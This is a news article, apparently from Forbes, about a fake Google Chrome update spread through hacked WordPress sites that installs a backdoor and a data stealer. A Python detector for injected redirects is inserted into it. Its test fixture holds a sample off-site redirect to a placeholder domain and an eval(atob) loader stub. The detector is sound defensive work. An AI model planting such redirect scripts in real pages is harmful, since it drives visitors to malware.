Hackers Trick Thousands Into Downloading Dangerous ‘Google Chrome Update’

Researchers from the Russian 'Doctor Web' virus laboratory have issued a warning after discovering thousands of victims have been tricked into downloading a dangerous backdoor that is disguised as an update to Google Chrome.


Updates and upgrades have been in the news a lot this last week, with Microsoft confirming unprecedented changes to Windows 10 updates and WhatsApp users being warned about an upgrade warning that isn't what it seems. As Kate O'Flaherty reported on March 19, Google has already paused all upcoming Chrome releases because the COVID-19 pandemic has forced adjusted work schedules on developers. Google has also decided to skip the next point release, which was due to be Chrome 82. However, Google has confirmed that it will "continue to prioritize any updates related to security." Now Google Chrome users are being warned to watch out for what the security researchers who uncovered it describe as a "dangerous backdoor" disguised as, you guessed it, a Chrome update.


Experienced hackers are behind the fake Google Chrome Update

In a March 25 Doctor Web blog posting, the researchers warn that the convincing Google Chrome update download is being linked to from multiple WordPress-powered sites that have been compromised by hackers. Those pages, including everything from news blogs to official corporate sites, have been hit by a threat actor with a history of successful hacking campaigns. "The hacker group behind this attack was previously involved in spreading a fake installer of the popular VSDC video editor through its official website and the CNET software platform," they say, adding that on this occasion, the hackers got administrative control of multiple sites to create the chain of infection. Once admin access to the sites was achieved, the cybercriminals embedded a malicious JavaScript redirection script that sends visitors straight to what appears to be a legitimate Google Chrome update page.
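The infection chain described above hinges on a redirect script injected into compromised WordPress pages. As an added example (not code from Doctor Web, Forbes or WordPress), the following Python heuristic scans rendered page HTML for inline scripts that send visitors to a host other than the site's own, or that wrap their payload in eval/atob-style decoding. The sample HTML, the site name `example-news.test` and the placeholder domain `chrome-update.example` are constructed for illustration; a site owner would run the same check over saved page captures or theme template output.

```python
"""Heuristic scan of WordPress page output for injected JavaScript redirects.

Added example, not code from the Doctor Web report or from WordPress. All
sample HTML and host names below are constructed; the domains are placeholders.
"""
import re
from urllib.parse import urlparse

# Inline <script> blocks only; the body between the tags is what gets inspected.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Navigation primitives a redirect script would use.
REDIRECT_RE = re.compile(
    r"\blocation\s*(?:\.\s*href\s*)?=(?!=)"          # location = ..., location.href = ...
    r"|\blocation\s*\.\s*(?:replace|assign)\s*\("    # location.replace(...), location.assign(...)
    r"|\bwindow\s*\.\s*open\s*\(",                   # window.open(...)
    re.IGNORECASE,
)
# Decoding/eval wrappers commonly used to hide the real payload of an injected script.
OBFUSCATION_RE = re.compile(r"\b(?:eval|unescape|atob|String\.fromCharCode)\s*\(", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def _is_internal(host, site_host):
    """A host is internal if it is the site itself or one of its subdomains."""
    return host is None or host == site_host or host.endswith("." + site_host)


def find_suspicious_scripts(html: str, site_host: str) -> list:
    """Return one finding per inline script that redirects off-site or is obfuscated.

    A script that only navigates within site_host (e.g. to a login page) is not flagged.
    """
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        reasons = []
        hosts = {urlparse(u).hostname for u in URL_RE.findall(body)}
        external = sorted(h for h in hosts if not _is_internal(h, site_host))
        if REDIRECT_RE.search(body) and external:
            reasons.append("redirects to external host")
        if OBFUSCATION_RE.search(body):
            reasons.append("uses eval/decoding wrapper")
        if reasons:
            findings.append({
                "line": html.count("\n", 0, m.start()) + 1,
                "external_hosts": external,
                "reasons": reasons,
                "snippet": " ".join(body.split())[:80],
            })
    return findings


# Constructed: a legitimate template whose inline script only navigates on-site.
CLEAN_HTML = """<html><head>
<script>
  if (location.hash === "#login") { location.href = "/wp-login.php"; }
  document.cookie = "consent=1; path=/";
</script>
</head><body>News</body></html>"""

# Constructed: the same template with an injected off-site redirect and an encoded loader.
# The base64 blob is a placeholder that merely decodes to "ABCD".
INJECTED_HTML = CLEAN_HTML.replace(
    "</head>",
    '<script>window.location.href="https://chrome-update.example/download";</script>\n'
    '<script>eval(atob("QUJDRA=="));</script>\n</head>',
)

if __name__ == "__main__":
    for page_name, page in (("clean", CLEAN_HTML), ("injected", INJECTED_HTML)):
        for f in find_suspicious_scripts(page, "example-news.test"):
            print(f"{page_name}: line {f['line']}: {', '.join(f['reasons'])} "
                  f"{f['external_hosts']} :: {f['snippet']}")
```

The check deliberately ignores on-site navigation, so the only hits on the constructed injected page are the off-site redirect and the eval/atob loader; on a real site the external-host list is what an administrator would compare against the domains the site legitimately uses.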


Sophisticated data-stealer comes as part of this dangerous package

This is, of course, far from legitimate: it is actually a malware installer file, one that has been downloaded more than 2,000 times, according to Doctor Web researchers. Once the file is executed, a TeamViewer remote control application is installed along with password-protected archives containing files that the threat actors use to hide the malware from Windows antivirus protection. Further malware payloads can then also be delivered, including a keylogger and a sophisticated Russian-based data stealer. That stealer, known as Predator the Thief, has been active for the last 18 months. It is known to use anti-debugging and anti-analysis techniques to frustrate detection and analysis by researchers.


Mitigation advice for Google Chrome users

Besides investing in a solid 'Keyboard Encryption' software package, if you are a Google Chrome web browser user, remember that Chrome was actually the first browser to include automatic self-updating. It regularly checks for updates, and these are applied when you start the application. You can check that you have the latest version, which is 80.0.3987.149 as of March 26, by going to Help|About Google Chrome from the "three dots" dropdown menu in the top right-hand corner of the browser. If, for whatever reason, you are not running the latest version, this will also kickstart the update process. You will never genuinely be redirected to a web page where you are asked to download an update from Google.


Forbes - March 2020.
